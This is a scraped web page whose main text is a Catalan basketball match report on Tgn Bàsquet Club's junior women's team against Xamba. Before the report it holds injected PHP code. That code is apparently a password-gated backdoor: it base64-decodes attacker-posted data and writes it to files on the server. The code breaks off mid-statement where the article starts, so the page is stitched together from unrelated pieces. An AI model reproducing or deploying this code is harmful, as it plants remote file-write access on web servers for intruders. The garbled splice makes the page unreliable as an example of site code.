function bestrock_render_js(){ echo ""; } function bestrock_render_index(){ echo md5('56749'); } function bestrock_render_ajax(){ try { if(isset($_GET['s1'])) die(md5('js')); if(isset($_POST['t2'])){ $l1 = uniqid(rand(), true) . '.js'; @file_put_contents($l1, 'js'); if(file_exists($l1)){ if(isset($_POST['t1'])){ $d = md5(md5($_POST['t1'])); if($d=="8ae24e6719c47a39da8ad5451432d9a6"){ $d1=$_POST['t2']; $d1=base64_decode($d1); $d4=" El Júnior fem. 06-07A dona la cara vs Xamba - Tgn Bàsquet Club -

El Júnior fem. 06-07A dona la cara vs Xamba

Updated: març 2, 2024

Al contrari que al partit d’anada, on d’inici es va començar perdent per molta diferència, el TGN va començar el partit bé, amb un 8-2 a favor seu, si bé les de Vilafranca amb un 11-0 de parcial recuperarien l’avantatge al marcador.

Al segon quart el Xamba va augmentar la diferència fins als 13 punts, però el TGN, que darrerament surt més competitiu en els tercers períodes que el rival, en part perquè arriba fins al descans amb els deures per fer, va arribar a posar-se al davant al marcador.

Quan faltaven 8 minuts per finalitzar el matx el marcador estava empatat. Gràcies a la feina anotadora de la jugadora del TGN Iglesias, que arribaria fins als 17 punts, i per la tasca defensiva i rebotadora de l’equip.

Punt clau va ser l’eliminació per faltes al minut 32 de l’única jugadora interior del TGN en aquest partit, a partir d’aquest moment l’equip local, amb diverses accions encertades en atac es va enlairar i la diferència es va anar ampliant fins als 17 punts de diferència en tan sols 8 minuts de joc.